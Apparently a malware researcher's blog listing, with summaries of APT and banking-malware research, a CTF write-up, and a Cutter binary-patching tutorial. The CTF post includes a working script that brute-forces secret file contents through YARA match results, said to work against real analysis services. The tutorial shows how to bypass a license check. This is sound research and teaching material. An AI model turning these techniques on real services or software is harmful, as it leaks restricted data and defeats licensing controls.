Mapping the connections inside Russia’s APT Ecosystem

Standard

If the names Turla, Sofacy, and APT29 strike fear into your heart, you are not alone. These are known to be some of the most advanced, sophisticated and notorious APT groups out there – and not in vain. These Russian-attributed actors are part of a bigger picture in which Russia is one of the strongest powers in the cyber warfare today. Their advanced tools, unique approaches, and solid infrastructures suggest enormous and complicated operations that involve different military and government entities inside Russia. 

Russia is known to conduct a wide range of cyber espionage and sabotage operations for the last three decades. Beginning with the first publicly known attacks by Moonlight Maze, in 1996, going through the Pentagon breach in 2008, Blacking out Kyiv in 2016, Hacking the US Elections in 2016, and up to some of the largest most infamous cyberattacks in history – targeting a whole country with NotPetya ransomware.

Indeed, numerous Russian operations and malware families were publicly exposed by different security vendors and intelligence organizations such as the FBI and the Estonian Foreign Intelligence Services. While all of these shed light on specific Russian actors or operations, the bigger picture remains hazy.

The fog behind these complicated operations made us realize that while we know a lot about single actors, we are short of seeing a whole ecosystem with actor interaction (or lack thereof) and particular TTPs that can be viewed in a larger scope. We decided to know more and to look at things from a broader perspective. This led us to gather, classify and analyze thousands of Russian APT malware samples in order to find connections – not only between samples but also between different families and actors. 

During this research, we analyzed approximately 2,000 samples that were attributed to Russia and found 22,000 connections between the samples and 3.85 million non-unique pieces of code that were shared. We classified these samples into 60 families and 200 different modules.

Share

Deobfuscating APT32 Flow Graphs with Cutter and Radare2

Standard

The Ocean Lotus group, also known as APT32, is a threat actor which has been known to target East Asian countries such as Vietnam, Laos and the Philippines. The group strongly focuses on Vietnam, especially private sector companies that are investing in a wide variety of industrial sectors in the country. While private sector companies are the group’s main targets, APT32 has also been known to target foreign governments, dissidents, activists, and journalists.

APT32’s toolset is wide and varied. It contains both advanced and simple components; it is a mixture of handcrafted tools and commercial or open-source ones, such as Mimikatz and Cobalt Strike. It runs the gamut from droppers, shellcode snippets, through decoy documents and backdoors. Many of these tools are highly obfuscated and seasoned, augmented with different techniques to make them harder to reverse-engineer.

In this article, we get up and close with one of these obfuscation techniques. This specific technique was used in a backdoor of Ocean Lotus’ tool collection. We’ll describe the technique and the difficulty it presents to analysts — and then show how bypassing this kind of technique is a matter of writing a simple script, as long as you know what you are doing.

Share

The Evolution of BackSwap

Standard

The BackSwap banker has been in the spotlight recently due to its unique and innovative techniques to steal money from victims while staying under the radar and remaining undetected. This malware was previously spotted targeting banks in Poland but has since moved entirely to focus on banks in Spain. The techniques used by it were thoroughly described by our fellow researchers at the Polish CERT and Michal Poslusny from ESET, who revealed and coined the malware’s name earlier this year. However after witnessing ongoing  improvements to its malicious techniques we decided to share this information to the wider research community.

In the following research paper, we will focus on the evolution of BackSwap, its uniqueness, successes, and even failures. We will try to give an overview of the malware’s different versions and campaigns, while outlining its techniques, some of which were proven inefficient and dropped soon after their release by the developers. We will also share a detailed table of IOC and a Python3 script used to extract relevant information from BackSwap’s samples.

This research was done and published by me on Check Point Research Blog

Share

CONFidence Teaser CTF – Hidden Flag

Standard

During CONFidence Teaser CTF, one specific task caught my interest. Not because it was hard or complicated – it wasn’t, but because the concept behind it was interesting and relevant to my day-to-day work as a malware researcher.

In this short article, I will show a highly esoteric, not to say trivial, concept in which you can leak the content of “sensitive” files on systems where scanning the files with Yara is allowed, but downloading the files is not possible. Not only that I’ll show how it was used, as an intended solution, to solve the “Hidden Flag” challenge on the CTF, but will also demonstrate how it can be used to retrieve the data of TLP;RED, or un-downloadable files on premium services such as Hybrid-Analysis, where the major limitation is the bandwidth.

Let’s not move too fast and start from the beginning, the CTF challenge. On “Hidden-Flag”, the most solved challenge in this CTF, we are given an online instance of mquery, a “YARA malware query accelerator”. In other words, the system lets you run your Yara rules on a repository of files, very fast. The flag, as it seems, exists in the content of a file found the corpus of files that are indexed and scanned by mquery. As a malware researcher, and as a cert.pl old fanboy, I was already familiar with mquery and experienced with using it.

The initial idea was to extract the flag using boolean queries of Yara rules. To prove that this concept really works, I started from this sample rule:

rule test {
  strings:
    $flag = "p4{"
  condition:
    $flag
}

And indeed, this simple rule showed that the concept is potentially possible and we can start slowly retrieving the flag.

In order to retrieve the rest of the flag, we can start to slowly “brute force” it character by character, hoping there will not be any “brute force” mitigation or similar limitation. Since I am familiar with the project, I know it has a REST API we can use for our help. For those of you who aren’t familiar, can figure this out from the tests.

And indeed, we can quickly write a script to brute force the flag character by character.

import string
import requests

QUERY_URL = "http://hidden.zajebistyc.tf/api/query/high"
MATCHES_URL = "http://hidden.zajebistyc.tf/api/matches/{}?offset=0&limit=50"

def request_query (query):
    res = requests.post(QUERY_URL, json={"method": "query", "raw_yara": query})
    res.raise_for_status()
    query_hash = res.json()["query_hash"]
    res = requests.get(MATCHES_URL.format(query_hash))
    if res.json()["job"]["status"] == "done":
        return res


# Define a rule tempplate

test_yara = """
rule find_flag {{
    strings:
        $flag = "{0}"
    condition:
        $flag
}}
"""

# Generate a list of potential characters
potential_chars = "-_}"+string.ascii_lowercase+string.digits+string.ascii_uppercase+"@!"  

# Start from the known prefix of the flag

flag = "p4{"

while True:
    print("[+] Found:",flag)
    for c in potential_chars:
        res = request_query(test_yara.format(flag + c))
        if len(res.json()["matches"]) > 0:
            flag += c
            break
    if c == "}":
        break

print("[+] Flag:", flag)

# flag is "p4{ind3x1ng-l3ak5}"

Let’s run the script and see the results come quickly:

$ python3 solution.py

[+] Found: p4{
[+] Found: p4{i
[+] Found: p4{in
[+] Found: p4{ind
[+] Found: p4{ind3
[+] Found: p4{ind3x
[+] Found: p4{ind3x1
[+] Found: p4{ind3x1n
[+] Found: p4{ind3x1ng
[+] Found: p4{ind3x1ng-
[+] Found: p4{ind3x1ng-l
[+] Found: p4{ind3x1ng-l3
[+] Found: p4{ind3x1ng-l3a
[+] Found: p4{ind3x1ng-l3ak
[+] Found: p4{ind3x1ng-l3ak5
[+] Flag: p4{ind3x1ng-l3ak5}
Share

5 Ways to patch binaries with Cutter

Standard

I recently watched a video by LiveOverflow in which he showed how different tools are used to patch binaries. By demonstrating some of the features that Radare2, Ghidra, and Binary Ninja offer for the task, the viewer can get some sense of the things they can get from using these tools.

While all these tools are great, and although Radare2 was showed there (and oh boy, things went wrong), there was one tool, which is dear to my heart, that wasn’t there – Cutter.  Notwithstanding that it is the youngest member of the pack, Cutter is growing up very fast and when it has to do with binary patching – it does not stay behind.

“Binary Patching”, for those the term is unfamiliar, is the process of applying small changes and modifications to a binary file, usually in order to change its behavior. By modifying data or code, the user can change certain values in the program or specific instructions, and adjust the binary to their desired outcome.

5 Ways to patch binaries with Cutter - banner

Wanna skip the boring parts? Jump straight to the methods:

Method 1: Reverse the jump
Method 2: Straight from the decompiler
Method 3: NOP’ing your way
Method 4: Disassemble the instruction
Method 5: Assemble the bytes
Bonus: Using radare2 console from within Cutter

Cutter

Cutter is a free and open-source reverse engineering framework powered by radare2. It offers a wide range of features for reverse-engineers where the most important of them are disassmebler, a grpah, a decompiler (based on Ghidra’s decompiler), and a hex-editor and from recently – a debugger.

To download the latest release of Cutter, ahead to the official website. If you want to build Cutter from the source to enjoy the latest improvement and features, and you are up for a ride – check out the Building page on the documentation.

Please note that this article will be quite straight forward and will not cover different features of Cutter.

Getting to know our target

For this article, we will use the same binary that was used on LiveOverflow’s video – license_1.c.

Click here to download the binary for Linux.

The source code can be found here and is also pasted below to make it easy for us.

#include <string.h>
#include <stdio.h>
int main(int argc, char *argv[]) {
        if(argc==2) {
		printf("Checking License: %s\n", argv[1]);
		if(strcmp(argv[1], "AAAA-Z10N-42-OK")==0) {
			printf("Access Granted!\n");
		} else {
			printf("WRONG!\n");
		}
	} else {
		printf("Usage: <key>\n");
	}
	return 0;
}

The program is rather simple. It receives a license-key from the user and then compares it to a hardcoded key “AAAA-Z10N-42-OK”. If the keys match, it will print “Access Granted!”. Otherwise, it will print “WRONG!”

$ license_1 test_key
Checking License: test_key
WRONG!

Out goal is to patch the program in a way that we will receive the Success message upon entering a wrong key.

Before we start – because we are going to modify the binary, I prefer to make a backup of the original file.

$ cp license_1 license_1.backup

Let’s open Cutter and select the license_1 binary from our computer. On the next dialog, make sure to select “Load in write mode (-w)”. You can leave the other settings as-is and press Ok.

Go to the main function by choosing it from the Functions list on the side or by typing “main” on the navigation-box at the top of the interface. The `main()` function is very small and contains all the logic of the program.

The function `main()` only has 6 blocks which makes it very easy for us to find the place we want to patch. And indeed, we see the block with strcmp comparison and we want to patch the conditional jump in a way that it will continue to the success message. By modifying `jne 0x400617` (jump not equal) to `je` (jump equal) we will get the success message as long as we do not give the right key. Muhahah.

 


Method 1: Reverse the jump

The easiest and probably the most intuitive way is to right-click the `jne` instruction and choose “Edit -> Reverse jump”.

Cutter is smart and can detect for us the inversed instruction for the condition. In this case, from `jne` to `je` and vice versa.

Now we can testthat our changes indeed work, with the same input we tried before. The changes we do are automatically apllied to the binary so we can simply test it.

$ license_1 test_key
Checking License: test_key
Access Granted!

Yes! Patching is easy. Let’s see other ways to do the same.

 


Method 2: Straight from the decompiler

If you downloaded the official release version, your Cutter should come with an integrated Ghidra decompiler via its native implementation called r2ghidra-dec. If you build Cutter by yourself, you will need to build r2ghidra-dec as well. Just follow the instructions in the link.

Open the decompiler window from “Windows -> Decompiler” and seek to the `main` function. Now click on the line where it says if (iVar1 == 0) { and again go to “Edit > Reverse jump.

This shows the great power of using the decompiler in Cutter.

 


Method 3: NOP’ing your way

This is yet another easy way to skip the check and go straight to the success message. Simply right-click on the condition in the disassembly view, and then select “Edit -> Nop Instruction”.

Before:

0x00400602 call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)
0x00400607 test eax, eax
0x00400609 jne 0x400617
0x0040060b mov edi, str.Access_Granted

After:

0x00400602 call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)
0x00400607 test eax, eax
0x00400609 nop
0x0040060a nop
0x0040060b mov edi, str.Access_Granted

 


Method 4: Disassemble the instruction

In this method, we will change the instructions itself from `jne` to je. Again, right-click on the condition and this time choose “Edit -> Instruction”. Then simply change the text from `jne 0x400617` to `je 0x400617`. Cutter will automatically fetch a preview of the bytes that are constructing the instruction. Press Ok.


Method 5: Assemble the bytes

If you are tired of assembly and want to go back to the old days of bytes-patching and modify the bytes themselves – you can! Simply go to “Edit -> Bytes” and change from `750c` to `740c` (from `jne` to je). Cutter will show you a preview of the instruction to make sure you are not making some mess.

 


Bonus: Using radare2 console from within Cutter

If you are familiar with radare2, you will likely be happy to know that Cutter is coming with an integrated radare2 console. Open it from “Windows -> Console” and start typing your favorite r2 commands. And that’s right, you can simply patch the bytes from the command-line using the `w` commands such as wx, wa and so on. To know more, check w?for help.

 

Epilogue

In this article, we learned a little bit more about this great tool called Cutter. We faced a problem that reverse-engineers are often faced, and solved it using 5 different methods. There are more methods to patch bytes (for example using the hex-editor in cutter) but these 5 should be enough of a start. Unlike most of my articles, this is a short post and a very straight forward one.  Hopefully, you learned something new. Cheers!

 

Share